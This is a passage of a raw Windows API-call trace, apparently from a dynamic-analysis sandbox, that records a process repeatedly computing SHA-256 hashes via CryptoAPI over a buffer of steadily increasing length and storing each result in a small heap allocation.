	[0191.244] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264450, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264450, pdwDataLen=0x1283b0) returned 1
	[0191.244] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.244] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.244] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.244] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.245] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0191.245] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.245] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264478
	[0191.245] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264478, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264478, pdwDataLen=0x1283b0) returned 1
	[0191.245] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.245] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.245] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.245] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.245] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0191.245] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.245] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2644a0
	[0191.245] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2644a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2644a0, pdwDataLen=0x1283b0) returned 1
	[0191.245] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.246] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.246] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.246] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.246] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0191.246] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.246] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2644c8
	[0191.246] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2644c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2644c8, pdwDataLen=0x1283b0) returned 1
	[0191.246] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.246] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.246] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.247] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.247] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0191.247] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.247] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2644f0
	[0191.247] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2644f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2644f0, pdwDataLen=0x1283b0) returned 1
	[0191.247] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.247] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.247] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.248] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.248] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0191.248] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.248] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264518
	[0191.248] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264518, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264518, pdwDataLen=0x1283b0) returned 1
	[0191.248] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.248] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.248] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.248] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.248] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0191.249] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.249] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264540
	[0191.249] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264540, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264540, pdwDataLen=0x1283b0) returned 1
	[0191.249] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.249] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.249] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.249] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.249] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0191.249] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.249] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264568
	[0191.249] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264568, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264568, pdwDataLen=0x1283b0) returned 1
	[0191.249] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.249] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.249] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.250] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.250] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0191.250] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.250] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264590
	[0191.250] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264590, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264590, pdwDataLen=0x1283b0) returned 1
	[0191.250] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.250] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.250] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.251] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.251] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0191.251] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.251] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2645b8
	[0191.251] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2645b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2645b8, pdwDataLen=0x1283b0) returned 1
	[0191.251] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.251] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.251] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.252] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.252] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0191.252] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.252] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2645e0
	[0191.252] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2645e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2645e0, pdwDataLen=0x1283b0) returned 1
	[0191.252] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.252] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.252] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.252] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.252] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0191.252] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.253] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264608
	[0191.253] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264608, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264608, pdwDataLen=0x1283b0) returned 1
	[0191.253] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.253] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.253] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.253] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.253] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0191.253] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.253] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264630
	[0191.253] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264630, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264630, pdwDataLen=0x1283b0) returned 1
	[0191.253] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.253] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.253] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.254] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.254] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0191.254] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264658
	[0191.254] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264658, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264658, pdwDataLen=0x1283b0) returned 1
	[0191.254] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.254] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.254] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.255] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.255] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0191.255] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264680
	[0191.255] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264680, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264680, pdwDataLen=0x1283b0) returned 1
	[0191.255] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.255] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.255] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.256] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.256] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0191.256] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2646a8
	[0191.256] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2646a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2646a8, pdwDataLen=0x1283b0) returned 1
	[0191.256] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.256] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.256] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.256] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.256] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0191.257] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2646d0
	[0191.257] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2646d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2646d0, pdwDataLen=0x1283b0) returned 1
	[0191.257] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.257] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.257] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.257] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.257] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0191.257] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2646f8
	[0191.257] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2646f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2646f8, pdwDataLen=0x1283b0) returned 1
	[0191.257] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.257] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.258] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.258] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.258] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0191.258] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264720
	[0191.258] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264720, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264720, pdwDataLen=0x1283b0) returned 1
	[0191.258] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.258] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.258] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.259] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.259] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0191.259] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264748
	[0191.259] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264748, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264748, pdwDataLen=0x1283b0) returned 1
	[0191.259] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.259] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.259] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.260] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.260] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0191.260] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264770
	[0191.260] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264770, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264770, pdwDataLen=0x1283b0) returned 1
	[0191.260] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.260] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.260] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.260] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.260] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0191.260] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.261] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264798
	[0191.261] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264798, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264798, pdwDataLen=0x1283b0) returned 1
	[0191.261] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.261] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.261] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.261] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.261] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0191.261] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.261] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2647c0
	[0191.261] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2647c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2647c0, pdwDataLen=0x1283b0) returned 1
	[0191.261] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.261] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.261] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.262] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.262] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0191.262] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2647e8
	[0191.262] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2647e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2647e8, pdwDataLen=0x1283b0) returned 1
	[0191.262] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.262] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.262] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.263] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.263] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0191.263] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264810
	[0191.263] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264810, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264810, pdwDataLen=0x1283b0) returned 1
	[0191.263] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.263] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.263] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.264] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.264] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0191.264] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264838
	[0191.264] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264838, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264838, pdwDataLen=0x1283b0) returned 1
	[0191.264] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.264] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.264] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
